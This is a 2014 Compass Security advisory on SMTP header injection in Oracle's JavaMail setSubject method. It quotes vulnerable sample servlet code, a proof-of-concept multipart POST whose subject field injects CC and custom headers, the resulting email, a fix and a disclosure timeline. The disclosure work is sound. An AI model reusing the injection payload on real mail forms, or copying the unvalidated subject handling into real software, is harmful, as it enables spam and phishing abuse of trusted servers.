#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: JavaMail
# Vendor: Oracle
# CSNC ID: CSNC-2014-001
# CVD ID: <none>
# Subject: SMTP Header Injection via method setSubject
# Risk: Medium
# Effect: Remotely exploitable
# Author: Alexandre Herzog <alexandre.herzog@csnc.ch>
# Date: 19.05.2014
#
#############################################################
Introduction:
-------------
The JavaMail API provides a platform-independent and
protocol-independent framework to build mail and messaging applications.
The JavaMail API is available as an optional package for use with the
Java SE platform and is also included in the Java EE platform.[1]
JavaMail does not check if the email subject contains a Carriage Return
(CR) or a Line Feed (LF) character on POST multipart requests. This
issue allows the injection of arbitrary SMTP headers in the generated
email. This flaw can be used for sending SPAM or other social
engineering attacks (e.g. abusing a trusted server to send HTML emails
with malicious content).
Affected:
---------
The following versions of JavaMail were tested and found vulnerable:
- 1.4.5 (included in the .war file used as demo from [2])
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])
Technical Description
---------------------
The tests were performed using the .war file downloaded from [2]. That
code features an example on how to send a file per email using JSP and
a servlet. The relevant parts of this example are:
[...]
/**
* A utility class for sending e-mail message with attachment.
* @author www.codejava.net
*
*/
public class EmailUtility {
/**
* Sends an e-mail message from a SMTP host with a list of attached files.
*
*/
public static void sendEmailWithAttachment(String host, String port,
final String userName, final String password, String toAddress,
String subject, String message, List<File> attachedFiles)
throws AddressException, MessagingException {
// sets SMTP server properties
Properties properties = new Properties();
properties.put("mail.smtp.host", host);
properties.put("mail.smtp.port", port);
properties.put("mail.smtp.auth", "true");
properties.put("mail.smtp.starttls.enable", "true");
properties.put("mail.user", userName);
properties.put("mail.password", password);
// creates a new session with an authenticator
Authenticator auth = new Authenticator() {
public PasswordAuthentication getPasswordAuthentication() {
return new PasswordAuthentication(userName, password);
}
};
Session session = Session.getInstance(properties, auth);
// creates a new e-mail message
Message msg = new MimeMessage(session);
msg.setFrom(new InternetAddress(userName));
InternetAddress[] toAddresses = { new InternetAddress(toAddress) };
msg.setRecipients(Message.RecipientType.TO, toAddresses);
==> msg.setSubject(subject);
msg.setSentDate(new Date());
[...]
[...]
/**
* A servlet that takes message details from user and send it as a new e-mail
* through an SMTP server. The e-mail message may contain attachments which
* are the files uploaded from client.
*
* @author www.codejava.net
*
*/
@WebServlet("/SendMailAttachServlet")
// CSNC comment - this tag enables the processing of POST multipart requests
@MultipartConfig(fileSizeThreshold = 1024 * 1024 * 2, // 2MB
maxFileSize = 1024 * 1024 * 10, // 10MB
maxRequestSize = 1024 * 1024 * 50) // 50MB
public class SendMailAttachServlet extends HttpServlet {
private String host;
private String port;
private String user;
private String pass;
public void init() {
// reads SMTP server setting from web.xml file
ServletContext context = getServletContext();
host = context.getInitParameter("host");
port = context.getInitParameter("port");
user = context.getInitParameter("user");
pass = context.getInitParameter("pass");
}
/**
* handles form submission
*/
protected void doPost(HttpServletRequest request,
HttpServletResponse response) throws ServletException, IOException {
List<File> uploadedFiles = saveUploadedFiles(request);
String recipient = request.getParameter("recipient");
==> String subject = request.getParameter("subject");
String content = request.getParameter("content");
String resultMessage = "";
try {
==> EmailUtility.sendEmailWithAttachment(host, port, user, pass,
recipient, subject, content, uploadedFiles);
resultMessage = "The e-mail was sent successfully";
} catch (Exception ex) {
Below is a genuine request POST request for the example above, done
using "Content-Type: multipart" as it involves uploading a file:
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1785
-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"
test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"
With javax.mail.1.5.1
-----------------------------205721274512326
Content-Disposition: form-data; name="content"
SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream
Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]
"Content-Type: multipart" allows us to submit a string containing a CR
or LF without having to use HEX characters %0A and %0D nor \n and \r. In
the JavaMail case, we abuse this feature to inject additional SMTP
headers through the Subject parameter in the request:
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1839
-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"
test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"
With javax.mail.1.5.1
==> CC: injected.header@[redacted]
==> X-other-header: foo bar
-----------------------------205721274512326
Content-Disposition: form-data; name="content"
SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream
Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]
This email is sent successfully and is received by the recipient under
the following form, where the injected SMTP headers are clearly visible:
[...]
From: [redacted]@gmail.com
To: test@[redacted]
Message-ID: <52c2e778.01030e0a.7154.fffff0c2@mx.google.com>
Subject: With javax.mail.1.5.1
CC: injected.header@[redacted]
==> X-other-header: foo bar
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_0_1681986934.1388504951836"
[...]
------=_Part_0_1681986934.1388504951836
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
SMTP header injection test
------=_Part_0_1681986934.1388504951836
Content-Type: application/octet-stream; name=NOTICE
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=NOTICE
Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]
The same behavior can be observed when using JavaMail 1.4.5 (bundled by
default in the example .war [2]) instead of the latest 1.5.1 JavaMail
version.
Workaround / Fix:
-----------------
Ensure your application strictly follows the JavaMail API and ensures
the subject string does not contain any line breaks (as stated in some
parts of the API [4]). An alternative would be to fix the setSubject
method of JavaMail by either disallowing the usage of CR/LF characters
or appending a space after each CR/LF character to be RFC compliant (see
2.2.3 Long Header Fields of RFC 2822 [5]).
Oracle issued the following statement regarding this matter: "The
assessment from our engineering team is that this is not a bug in
JavaMail API. The application is responsible to perform some input
validation. In this particular case, the application is responsible for
ensuring that the subject string does not contain any line breaks. The
code demonstrated the issue is not an Oracle sample. Therefore, we are
closing the issue as not-a-bug."
Timeline:
---------
2014-05-19: Global publication of the advisory
2014-03-19: Advisory sent to Compass Security's customers
2014-02-19: Got confirmation from Oracle they agree our publication
schedule
2014-02-18: Informed Oracle that we plan to publish details of this
issue to our customer this week and to the general
public in a month
2014-02-05: Informed Oracle we consider publishing this information
2014-02-04: Response from Oracle: is not considered a bug
2014-01-23: Status report from Oracle mentioning the case being
"Under investigation / Being fixed in main codeline"
2014-01-01: Reception acknowledgement from Oracle
2014-01-01: Sending advisory and PoC to Oracle
2014-01-01: Isolation and reproduction of an issue discovered
previously by the author
References:
-----------
[1] http://www.oracle.com/technetwork/java/javamail/index.html
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-jsp-servlet-and-javamail
[3] https://java.net/projects/javamail/pages/Home
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessage.html#setSubject(java.lang.String)
[5] http://www.ietf.org/rfc/rfc2822.txt
--
Alexandre Herzog, CTO, Compass Security Schweiz AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
http://www.csnc.ch/